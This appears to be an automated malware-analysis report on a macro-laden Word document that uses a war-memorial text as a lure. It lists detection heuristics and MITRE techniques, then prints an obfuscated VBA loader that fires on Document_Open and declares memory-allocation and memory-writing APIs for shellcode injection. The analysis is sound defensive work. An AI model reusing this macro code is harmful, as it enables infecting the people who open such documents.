MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a critical ClamAV heuristic and a high-severity heuristic for a Document_Open macro indicates malicious intent. The VBA macro code, though partially obfuscated, contains API calls for memory allocation and writing, suggesting it's designed to download and execute a second-stage payload. The document itself is a benign text about a war memorial, likely used as a lure.
Heuristics (4)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11743 bytes |
SHA-256: b30862c9da01e9380dc25500b8fa71df0015226be89c42a33f8782a5ef25460f
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
analyticity
gobemouche = 3 + 51
Pmt 0, gobemouche, 35619, 23122, 6
End Sub
Attribute VB_Name = "indistinction"
Attribute VB_Base = "0{AEECEAFD-FAE6-408C-8BA7-EE0FE94702EC}{9497E2A0-91E3-46D8-9D43-3ADB868F69D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bonasa"
#If (43 - 102 + 459 + 36 - 86 + 350) > ((25 - 31 + 326) - (15 - 52 + 577) * 1) And ((70 - 121 + 79) - (17 - 1 + 12)) * 2 < (Win64) Then
Public Declare PtrSafe Function overlay _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal anshar As Any, ByVal fanatic As Any, ByVal downy As Any, ByVal chukker As Any, ByVal midiron As Any) As LongPtr
Public Declare PtrSafe Function bisect _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (amoret As Any, ByVal medusa As Any, ByVal suffocation As Any, ByVal piously As Any, ByVal ceratosaur As Any, ByVal apolitical As Any, ByVal attractiveness As Any) As Long
Public Declare PtrSafe Function picking _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (akaryocyte As LongPtr, apiculated As LongPtr, ByVal consenting As LongPtr, cynopterusByVal As LongPtr, dirk As LongPtr, ByVal dauber As LongPtr) As LongPtr
#End If
#If (107 - 86 + 379 + 53 - 125 + 372) > ((98 - 71 + 293) - (8 - 14 + 546) * 1) And Not ((60 - 63 + 31) - (107 - 37 - 42)) * 2 < (Win64) Then
Public Declare Function picking _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (mordacity As Long, townsendia As Long, ByVal marxistleninist As Long, checkByVal As Long, miller As Long, ByVal juniorgrade As Long) As Long
Public Declare Function bisect _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (expositor As Any, ByVal glaswegian As Any, ByVal benedick As Any, ByVal abulia As Any, ByVal budget As Any, ByVal diametrically As Any, ByVal acromatic As Any) As Long
Public Declare Function overlay _
Lib "Ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal salutation As Any, ByVal unpurified As Any, ByVal choking As Any, ByVal drone As Any, ByVal glass As Any) As Long
#End If
Function macrocolous()
Dim polioptila(255) As Byte
lightingup = 46 - 37 + 56
For i = lightingup To (110 - 56 + 37)
polioptila(lightingup) = lightingup - (60 - 86 + 91)
lightingup = lightingup + 1
If (45 - 8 + 54) < lightingup Then
gnostic = malignant + 50 - 57 + 72
Exit For
End If
centesimal = distraint + 54 - 24 + 35
Next
lightingup = (97 - 103 + 54)
For i = lightingup To (125 - 90 + 23)
polioptila(lightingup) = lightingup + (101 - 121 + 24)
lightingup = lightingup + 1
If (53 - 127 + 132) < lightingup Then
epuration = birr + 25 - 70 + 110
Exit For
End If
mechanic = musical + 22 - 8 + 51
Next
lightingup = (112 - 48 + 33)
For i = lightingup To (54 - 128 + 197)
polioptila(lightingup) = lightingup - (39 - 58 + 90)
lightingup = lightingup + 1
indelible = nefariousness + 117 - 91 + 39
If (114 - 65 + 74) < lightingup Then
teary = crotaphytus + 76 - 39 + 28
Exit For
End If
tributary = annexational + 123 - 115 + 57
Next
polioptila(96 - 109 + 60) = (125 - 9 - 53)
lightingup = (74 - 63 + 32)
polioptila(lightingup) = (18 - 75 + 119)
macrocolous = polioptila
End Function
Function capsicum(truth, perfoliate, plum)
Select Case plum
Case 20 + (10 / 2 - 5)
capsicum = truth \ perfoliate
Case 30 + (5 - 3) / 2 - 1
capsicum = truth And perfoliate
Case 38 + (56 / 7 - 4 * 2)
capsicum = truth * perfoliate
End Select
End Function
Function beagling(oxidizable) As String
Dim speak As Long
Dim insect As Long
Dim bedlam(63) As Long
biogenetic = Fix(220)
Dim meiosis As Integer
Dim monogynous(6962) As Byte
Dim hypentelium(63) As Long
Dim
... (truncated)